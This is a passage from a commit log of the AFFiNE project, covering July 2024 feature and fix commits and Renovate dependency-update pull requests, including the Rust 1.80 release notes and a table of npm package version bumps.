- [`impl Default for Rc<[T]>`](https://doc.rust-lang.org/beta/alloc/rc/struct.Rc.html#impl-Default-for-Rc%3C%5BT%5D%3E )
- [`impl Default for Arc<str>`](https://doc.rust-lang.org/beta/alloc/sync/struct.Arc.html#impl-Default-for-Arc%3Cstr%3E )
- [`impl Default for Arc<CStr>`](https://doc.rust-lang.org/beta/alloc/sync/struct.Arc.html#impl-Default-for-Arc%3CCStr%3E )
- [`impl Default for Arc<[T]>`](https://doc.rust-lang.org/beta/alloc/sync/struct.Arc.html#impl-Default-for-Arc%3C%5BT%5D%3E )
- [`impl IntoIterator for Box<[T]>`](https://doc.rust-lang.org/beta/alloc/boxed/struct.Box.html#impl-IntoIterator-for-Box%3C%5BI%5D,+A%3E )
- [`impl FromIterator<String> for Box<str>`](https://doc.rust-lang.org/beta/alloc/boxed/struct.Box.html#impl-FromIterator%3CString%3E-for-Box%3Cstr%3E )
- [`impl FromIterator<char> for Box<str>`](https://doc.rust-lang.org/beta/alloc/boxed/struct.Box.html#impl-FromIterator%3Cchar%3E-for-Box%3Cstr%3E )
- [`LazyCell`](https://doc.rust-lang.org/beta/core/cell/struct.LazyCell.html )
- [`LazyLock`](https://doc.rust-lang.org/beta/std/sync/struct.LazyLock.html )
- [`Duration::div_duration_f32`](https://doc.rust-lang.org/beta/std/time/struct.Duration.html#method.div_duration_f32 )
- [`Duration::div_duration_f64`](https://doc.rust-lang.org/beta/std/time/struct.Duration.html#method.div_duration_f64 )
- [`Option::take_if`](https://doc.rust-lang.org/beta/std/option/enum.Option.html#method.take_if )
- [`Seek::seek_relative`](https://doc.rust-lang.org/beta/std/io/trait.Seek.html#method.seek_relative )
- [`BinaryHeap::as_slice`](https://doc.rust-lang.org/beta/std/collections/struct.BinaryHeap.html#method.as_slice )
- [`NonNull::offset`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.offset )
- [`NonNull::byte_offset`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.byte_offset )
- [`NonNull::add`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.add )
- [`NonNull::byte_add`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.byte_add )
- [`NonNull::sub`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.sub )
- [`NonNull::byte_sub`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.byte_sub )
- [`NonNull::offset_from`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.offset_from )
- [`NonNull::byte_offset_from`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.byte_offset_from )
- [`NonNull::read`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.read )
- [`NonNull::read_volatile`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.read_volatile )
- [`NonNull::read_unaligned`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.read_unaligned )
- [`NonNull::write`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.write )
- [`NonNull::write_volatile`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.write_volatile )
- [`NonNull::write_unaligned`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.write_unaligned )
- [`NonNull::write_bytes`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.write_bytes )
- [`NonNull::copy_to`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.copy_to )
- [`NonNull::copy_to_nonoverlapping`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.copy_to_nonoverlapping )
- [`NonNull::copy_from`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.copy_from )
- [`NonNull::copy_from_nonoverlapping`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.copy_from_nonoverlapping )
- [`NonNull::replace`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.replace )
- [`NonNull::swap`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.swap )
- [`NonNull::drop_in_place`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.drop_in_place )
- [`NonNull::align_offset`](https://doc.rust-lang.org/beta/std/ptr/struct.NonNull.html#method.align_offset )
- [`<[T]>::split_at_checked`](https://doc.rust-lang.org/beta/std/primitive.slice.html#method.split_at_checked )
- [`<[T]>::split_at_mut_checked`](https://doc.rust-lang.org/beta/std/primitive.slice.html#method.split_at_mut_checked )
- [`str::split_at_checked`](https://doc.rust-lang.org/beta/std/primitive.str.html#method.split_at_checked )
- [`str::split_at_mut_checked`](https://doc.rust-lang.org/beta/std/primitive.str.html#method.split_at_mut_checked )
- [`str::trim_ascii`](https://doc.rust-lang.org/beta/std/primitive.str.html#method.trim_ascii )
- [`str::trim_ascii_start`](https://doc.rust-lang.org/beta/std/primitive.str.html#method.trim_ascii_start )
- [`str::trim_ascii_end`](https://doc.rust-lang.org/beta/std/primitive.str.html#method.trim_ascii_end )
- [`<[u8]>::trim_ascii`](https://doc.rust-lang.org/beta/core/primitive.slice.html#method.trim_ascii )
- [`<[u8]>::trim_ascii_start`](https://doc.rust-lang.org/beta/core/primitive.slice.html#method.trim_ascii_start )
- [`<[u8]>::trim_ascii_end`](https://doc.rust-lang.org/beta/core/primitive.slice.html#method.trim_ascii_end )
- [`Ipv4Addr::BITS`](https://doc.rust-lang.org/beta/core/net/struct.Ipv4Addr.html#associatedconstant.BITS )
- [`Ipv4Addr::to_bits`](https://doc.rust-lang.org/beta/core/net/struct.Ipv4Addr.html#method.to_bits )
- [`Ipv4Addr::from_bits`](https://doc.rust-lang.org/beta/core/net/struct.Ipv4Addr.html#method.from_bits )
- [`Ipv6Addr::BITS`](https://doc.rust-lang.org/beta/core/net/struct.Ipv6Addr.html#associatedconstant.BITS )
- [`Ipv6Addr::to_bits`](https://doc.rust-lang.org/beta/core/net/struct.Ipv6Addr.html#method.to_bits )
- [`Ipv6Addr::from_bits`](https://doc.rust-lang.org/beta/core/net/struct.Ipv6Addr.html#method.from_bits )
- [`Vec::<[T; N]>::into_flattened`](https://doc.rust-lang.org/beta/alloc/vec/struct.Vec.html#method.into_flattened )
- [`<[[T; N]]>::as_flattened`](https://doc.rust-lang.org/beta/core/primitive.slice.html#method.as_flattened )
- [`<[[T; N]]>::as_flattened_mut`](https://doc.rust-lang.org/beta/core/primitive.slice.html#method.as_flattened_mut )
These APIs are now stable in const contexts:
- [`<[T]>::last_chunk`](https://doc.rust-lang.org/beta/core/primitive.slice.html#method.last_chunk )
- [`BinaryHeap::new`](https://doc.rust-lang.org/beta/std/collections/struct.BinaryHeap.html#method.new )
<a id="1.80-Cargo"></a>
## Cargo
- [Stabilize `-Zcheck-cfg` as always enabled](https://togithub.com/rust-lang/cargo/pull/13571/ )
- [Warn, rather than fail publish, if a target is excluded](https://togithub.com/rust-lang/cargo/pull/13713/ )
- [Add special `check-cfg` lint config for the `unexpected_cfgs` lint](https://togithub.com/rust-lang/cargo/pull/13913/ )
- [Stabilize `cargo update --precise <yanked>`](https://togithub.com/rust-lang/cargo/pull/13974/ )
- [Don't change file permissions on `Cargo.toml` when using `cargo add`](https://togithub.com/rust-lang/cargo/pull/13898/ )
- [Support using `cargo fix` on IPv6-only networks](https://togithub.com/rust-lang/cargo/pull/13907/ )
<a id="1.80-Rustdoc"></a>
## Rustdoc
- [Allow searching for references](https://togithub.com/rust-lang/rust/pull/124148/ )
- [Stabilize `custom_code_classes_in_docs` feature](https://togithub.com/rust-lang/rust/pull/124577/ )
- [fix: In cross-crate scenarios show enum variants on type aliases of enums](https://togithub.com/rust-lang/rust/pull/125300/ )
<a id="1.80-Compatibility-Notes"></a>
## Compatibility Notes
- [rustfmt estimates line lengths differently when using non-ascii characters](https://togithub.com/rust-lang/rustfmt/issues/6203 )
- [Type aliases are now handled correctly in orphan check](https://togithub.com/rust-lang/rust/pull/117164/ )
- [Allow instructing rustdoc to read from stdin via `-`](https://togithub.com/rust-lang/rust/pull/124611/ )
- [`std::env::{set_var, remove_var}` can no longer be converted to safe function pointers and no longer implement the `Fn` family of traits](https://togithub.com/rust-lang/rust/pull/124636 )
- [Warn (or error) when `Self` constructor from outer item is referenced in inner nested item](https://togithub.com/rust-lang/rust/pull/124187/ )
- [Turn `indirect_structural_match` and `pointer_structural_match` lints into hard errors](https://togithub.com/rust-lang/rust/pull/124661/ )
- [Make `where_clause_object_safety` lint a regular object safety violation](https://togithub.com/rust-lang/rust/pull/125380/ )
- [Turn `proc_macro_back_compat` lint into a hard error.](https://togithub.com/rust-lang/rust/pull/125596/ )
- [Detect unused structs even when implementing private traits](https://togithub.com/rust-lang/rust/pull/122382/ )
- [`std::sync::ReentrantLockGuard<T>` is no longer `Sync` if `T: !Sync`](https://togithub.com/rust-lang/rust/pull/125527 ) which means [`std::io::StdoutLock` and `std::io::StderrLock` are no longer Sync](https://togithub.com/rust-lang/rust/issues/127340 )
<a id="1.80-Internal-Changes"></a>
## Internal Changes
These changes do not affect any public interfaces of Rust, but they represent
significant improvements to the performance or internals of rustc and related
tools.
- Misc improvements to size of generated html by rustdoc e.g. [#​124738](https://togithub.com/rust-lang/rust/pull/124738/ ) and [#​123734](https://togithub.com/rust-lang/rust/pull/123734/ )
- [MSVC targets no longer depend on libc](https://togithub.com/rust-lang/rust/pull/124050/ )
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40NDAuNyIsInVwZGF0ZWRJblZlciI6IjM3LjQ0MC43IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->
2024-07-30 04:42:06 +00:00
Brooooooklyn
f052547b78
ci: attest provenance ( #7609 )
2024-07-30 04:24:16 +00:00
pengx17
4a2d400087
chore(electron): remove unused ipc code ( #7636 )
...
fix AF-1120
2024-07-30 04:12:06 +00:00
pengx17
157cc97a65
test(electron): add test cases for electron tabs ( #7635 )
...
fix AF-1000
2024-07-29 11:05:24 +00:00
pengx17
1efc1d0f5b
feat(electron): multi tabs support ( #7440 )
...
use https://www.electronjs.org/docs/latest/api/web-contents-view to serve different tab views
added tabs view manager in electron to handle multi-view actions and events.
fix AF-1111
fix AF-999
fix PD-1459
fix AF-964
PD-1458
2024-07-29 11:05:22 +00:00
L-Sun
622715d2f3
feat(core): outline viewer (quick toc) ( #7614 )
...
Close: [BS-949](https://linear.app/affine-design/issue/BS-949/outline-viewer-加入到affine )
Details are in this PR: https://github.com/toeverything/blocksuite/pull/7704
2024-07-29 10:19:57 +00:00
EYHN
1b4d65fd64
fix(core): optimize sidebar tag performance ( #7633 )
2024-07-29 09:57:40 +00:00
EYHN
a0cbf05da8
fix(core): sidebar renaming bug ( #7632 )
2024-07-29 09:57:37 +00:00
EYHN
0472ffe569
feat(core): support sidebar collapse ( #7630 )
2024-07-29 09:57:33 +00:00
donteatfriedrice
c5cf8480fc
feat: add event tracker for ai chat block ( #7637 )
...
[BS-940](https://linear.app/affine-design/issue/BS-940/ai-chat-block-相关埋点 )
related: https://github.com/toeverything/blocksuite/pull/7733
2024-07-29 09:42:29 +00:00
donteatfriedrice
ab11f09b83
feat: bump blocksuite ( #7634 )
...
## Features
- https://github.com/toeverything/BlockSuite/pull/7704 @L-Sun
- https://github.com/toeverything/BlockSuite/pull/7733 @donteatfriedrice
- https://github.com/toeverything/BlockSuite/pull/7585 @fundon
## Bugfix
- https://github.com/toeverything/BlockSuite/pull/7749 @zzj3720
- https://github.com/toeverything/BlockSuite/pull/7745 @zzj3720
- https://github.com/toeverything/BlockSuite/pull/7737 @fundon
- https://github.com/toeverything/BlockSuite/pull/7734 @fundon
- https://github.com/toeverything/BlockSuite/pull/7735 @L-Sun
- https://github.com/toeverything/BlockSuite/pull/7730 @fourdim
- https://github.com/toeverything/BlockSuite/pull/7718 @fourdim
- https://github.com/toeverything/BlockSuite/pull/7723 @Flrande
## Refactor
- https://github.com/toeverything/BlockSuite/pull/7738 @zzj3720
- https://github.com/toeverything/BlockSuite/pull/7731 @fourdim
- https://github.com/toeverything/BlockSuite/pull/7732 @zzj3720
- https://github.com/toeverything/BlockSuite/pull/7724 @doouding
- https://github.com/toeverything/BlockSuite/pull/7725 @doodlewind
## Misc
- https://github.com/toeverything/BlockSuite/pull/7748 @doodlewind
- https://github.com/toeverything/BlockSuite/pull/7721 @fundon
- https://github.com/toeverything/BlockSuite/pull/7729 @fundon
- https://github.com/toeverything/BlockSuite/pull/7728 @L-Sun
- https://github.com/toeverything/BlockSuite/pull/7595 @fundon
2024-07-29 08:42:22 +00:00
CatsJuice
5c62a2b2f5
feat(core): add doc/tag/collection to folders via menu ( #7631 )
...
close AF-993,AF-995,AF-997,AF-998
2024-07-29 07:30:20 +00:00
CatsJuice
b9c0119d2c
fix(core): adjust believer card dark mode style ( #7623 )
2024-07-29 07:15:17 +00:00
CatsJuice
214f5fa94d
fix(core): sidebar node content should ellipsis when overflowed ( #7627 )
2024-07-29 06:59:16 +00:00
EYHN
e6f0847ec3
fix(core): make indexer faster ( #7629 )
2024-07-29 06:43:13 +00:00
renovate
94a55cde62
chore: bump up @blocksuite/icons version to v2.1.61 ( #7541 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [@blocksuite/icons](https://togithub.com/toeverything/icons ) | [`2.1.60` -> `2.1.61`](https://renovatebot.com/diffs/npm/@blocksuite%2ficons/2.1.60/2.1.61 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@blocksuite/icons](https://togithub.com/toeverything/icons ) | [`2.1.59` -> `2.1.61`](https://renovatebot.com/diffs/npm/@blocksuite%2ficons/2.1.59/2.1.61 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>toeverything/icons (@​blocksuite/icons)</summary>
### [`v2.1.61`](aba7bbbbc1...280d3edea6 )
[Compare Source](aba7bbbbc1...280d3edea6 )
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about these updates again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40MzEuNCIsInVwZGF0ZWRJblZlciI6IjM3LjQ0MC43IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->
2024-07-29 03:20:32 +00:00
donteatfriedrice
1575472a3f
feat: support chatting in center peek ( #7601 )
2024-07-26 09:36:26 +00:00
EYHN
6bc5337307
refactor(core): adjust modal animation ( #7606 )
...
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/g3jz87HxbjOJpXV3FPT7/529d6c3f-4b23-43ac-84cc-171713d3dc72.mp4 ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/g3jz87HxbjOJpXV3FPT7/529d6c3f-4b23-43ac-84cc-171713d3dc72.mp4 ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/g3jz87HxbjOJpXV3FPT7/529d6c3f-4b23-43ac-84cc-171713d3dc72.mp4 ">CleanShot 2024-07-25 at 20.04.01.mp4</video>
When a modal is closed, sometimes its components are completely unmounted from the component tree, making it difficult to animate. This pr defining a custom element as the container of ReactDOM.portal, rewriting the `removeChild` function, and use `startViewTransition` when ReactDOM calls it to implement the animation.
# Save Input
Some inputs use blur event to save data, but when they are unmounted, blur event will not be triggered at all. This pr changes blur event to native addEventListener, which will be called after the DOM element is unmounted, so as to save data in time.
2024-07-26 08:39:34 +00:00
EYHN
3eb09cde5e
feat(core): new favorite ( #7590 )
2024-07-26 08:15:32 +00:00
darkskygit
5207e7abfc
fix: repeated slides ( #7612 )
...
fix AF-1104
2024-07-26 07:59:06 +00:00
Brooooooklyn
fcc42104fa
build: make nightly version shorter ( #7613 )
...
Ref: https://github.com/toeverything/AFFiNE/actions/runs/10091231369
2024-07-26 07:45:23 +00:00
Cats Juice
c63d007571
feat(core): add doc/collection/tag select hook ( #7593 )
2024-07-26 15:44:56 +08:00
fundon
2a2a19fec7
chore(component): add a danger hover style for buttons ( #7600 )
...
Like other delete buttons.
https://github.com/user-attachments/assets/85d1c3cb-bd17-4904-b671-c04c76bfd00b
2024-07-26 07:30:10 +00:00
renovate
1306a3be61
chore: bump up all non-major dependencies ( #7517 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence | Type | Update |
|---|---|---|---|---|---|---|---|
| [@apollo/server](https://togithub.com/apollographql/apollo-server ) ([source](https://togithub.com/apollographql/apollo-server/tree/HEAD/packages/server )) | [`4.10.4` -> `4.10.5`](https://renovatebot.com/diffs/npm/@apollo%2fserver/4.10.4/4.10.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@aws-sdk/client-s3](https://togithub.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://togithub.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.614.0` -> `3.620.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.614.0/3.620.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@aws-sdk/client-s3](https://togithub.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://togithub.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.614.0` -> `3.620.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.614.0/3.620.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@emotion/cache](https://togithub.com/emotion-js/emotion/tree/main#readme ) ([source](https://togithub.com/emotion-js/emotion )) | [`11.11.0` -> `11.13.1`](https://renovatebot.com/diffs/npm/@emotion%2fcache/11.11.0/11.13.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@emotion/react](https://togithub.com/emotion-js/emotion/tree/main#readme ) ([source](https://togithub.com/emotion-js/emotion )) | [`11.11.4` -> `11.13.0`](https://renovatebot.com/diffs/npm/@emotion%2freact/11.11.4/11.13.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@emotion/react](https://togithub.com/emotion-js/emotion/tree/main#readme ) ([source](https://togithub.com/emotion-js/emotion )) | [`11.11.4` -> `11.13.0`](https://renovatebot.com/diffs/npm/@emotion%2freact/11.11.4/11.13.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@emotion/styled](https://togithub.com/emotion-js/emotion/tree/main#readme ) ([source](https://togithub.com/emotion-js/emotion )) | [`11.11.5` -> `11.13.0`](https://renovatebot.com/diffs/npm/@emotion%2fstyled/11.11.5/11.13.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@floating-ui/dom](https://floating-ui.com ) ([source](https://togithub.com/floating-ui/floating-ui/tree/HEAD/packages/dom )) | [`1.6.7` -> `1.6.8`](https://renovatebot.com/diffs/npm/@floating-ui%2fdom/1.6.7/1.6.8 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@napi-rs/cli](https://togithub.com/napi-rs/napi-rs ) | [`3.0.0-alpha.60` -> `3.0.0-alpha.62`](https://renovatebot.com/diffs/npm/@napi-rs%2fcli/3.0.0-alpha.60/3.0.0-alpha.62 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@napi-rs/simple-git](https://togithub.com/Brooooooklyn/simple-git ) | [`0.1.16` -> `0.1.17`](https://renovatebot.com/diffs/npm/@napi-rs%2fsimple-git/0.1.16/0.1.17 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@napi-rs/simple-git](https://togithub.com/Brooooooklyn/simple-git ) | [`0.1.16` -> `0.1.17`](https://renovatebot.com/diffs/npm/@napi-rs%2fsimple-git/0.1.16/0.1.17 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@nx/vite](https://nx.dev ) ([source](https://togithub.com/nrwl/nx/tree/HEAD/packages/vite )) | [`19.4.3` -> `19.5.3`](https://renovatebot.com/diffs/npm/@nx%2fvite/19.4.3/19.5.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@playwright/test](https://playwright.dev ) ([source](https://togithub.com/microsoft/playwright )) | [`=1.44.1` -> `=1.45.3`](https://renovatebot.com/diffs/npm/@playwright%2ftest/1.44.1/1.45.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@prisma/client](https://www.prisma.io ) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/client )) | [`5.16.2` -> `5.17.0`](https://renovatebot.com/diffs/npm/@prisma%2fclient/5.16.2/5.17.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@prisma/instrumentation](https://www.prisma.io ) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/instrumentation )) | [`5.16.2` -> `5.17.0`](https://renovatebot.com/diffs/npm/@prisma%2finstrumentation/5.16.2/5.17.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@sentry/react](https://togithub.com/getsentry/sentry-javascript/tree/master/packages/react ) ([source](https://togithub.com/getsentry/sentry-javascript )) | [`8.17.0` -> `8.20.0`](https://renovatebot.com/diffs/npm/@sentry%2freact/8.17.0/8.20.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@sentry/react](https://togithub.com/getsentry/sentry-javascript/tree/master/packages/react ) ([source](https://togithub.com/getsentry/sentry-javascript )) | [`8.17.0` -> `8.20.0`](https://renovatebot.com/diffs/npm/@sentry%2freact/8.17.0/8.20.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@swc/core](https://swc.rs ) ([source](https://togithub.com/swc-project/swc )) | [`1.6.13` -> `1.7.2`](https://renovatebot.com/diffs/npm/@swc%2fcore/1.6.13/1.7.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@toeverything/theme](https://togithub.com/toeverything/design ) | [`1.0.0` -> `1.0.1`](https://renovatebot.com/diffs/npm/@toeverything%2ftheme/1.0.0/1.0.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@types/eslint](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/eslint ) ([source](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/eslint )) | [`8.56.10` -> `8.56.11`](https://renovatebot.com/diffs/npm/@types%2feslint/8.56.10/8.56.11 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@types/node](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/node ) ([source](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/node )) | [`20.14.10` -> `20.14.12`](https://renovatebot.com/diffs/npm/@types%2fnode/20.14.10/20.14.12 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [dayjs](https://day.js.org ) ([source](https://togithub.com/iamkun/dayjs )) | [`1.11.11` -> `1.11.12`](https://renovatebot.com/diffs/npm/dayjs/1.11.11/1.11.12 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [electron](https://togithub.com/electron/electron ) | [`~30.2.0` -> `~30.3.0`](https://renovatebot.com/diffs/npm/electron/30.2.0/30.3.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [electron-log](https://togithub.com/megahertz/electron-log ) | [`5.1.5` -> `5.1.7`](https://renovatebot.com/diffs/npm/electron-log/5.1.5/5.1.7 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [embla-carousel-react](https://www.embla-carousel.com ) ([source](https://togithub.com/davidjerleke/embla-carousel )) | [`8.1.6` -> `8.1.7`](https://renovatebot.com/diffs/npm/embla-carousel-react/8.1.6/8.1.7 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
